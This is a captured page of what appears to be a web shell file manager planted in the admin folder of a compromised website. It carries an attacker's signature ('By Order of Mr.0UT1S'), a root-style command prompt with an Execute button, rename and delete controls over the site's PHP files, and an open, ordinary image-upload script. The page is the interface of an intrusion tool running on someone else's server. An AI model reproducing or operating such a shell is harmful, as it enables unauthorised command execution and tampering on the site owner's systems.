home
/
aioutajg
/
playpauseonline.com
/
admin
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] ckeditor
N/A
[DIR] css
N/A
[DIR] uploads
N/A
config.php
1.02 KB
Rename
Delete
error_log
4.08 KB
Rename
Delete
index.php
2.41 KB
Rename
Delete
install.php
1.07 KB
Rename
Delete
login.php
1.99 KB
Rename
Delete
logout.php
812 bytes
Rename
Delete
post.php
13.47 KB
Rename
Delete
upload_image.php
1019 bytes
Rename
Delete
<?php // admin/upload_image.php require 'config.php'; header('Content-Type: application/json'); // Basic CSRF check if ($_SERVER['REQUEST_METHOD'] !== 'POST' || $_POST['csrf_token'] !== $_SESSION['csrf_token']) { http_response_code(403); echo json_encode(['error' => 'Invalid request']); exit; } if (!isset($_FILES['upload'])) { echo json_encode(['error' => 'No file uploaded']); exit; } $finfo = new finfo(FILEINFO_MIME_TYPE); $mime = $finfo->file($_FILES['upload']['tmp_name']); $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp']; if (!isset($allowed[$mime])) { echo json_encode(['error' => 'Invalid file type']); exit; } $filename = bin2hex(random_bytes(12)) . '.' . $allowed[$mime]; $target = UPLOAD_DIR . $filename; if (move_uploaded_file($_FILES['upload']['tmp_name'], $target)) { echo json_encode(['url' => UPLOADS_URL . $filename]); } else { echo json_encode(['error' => 'Failed to upload image']); } ?>
Save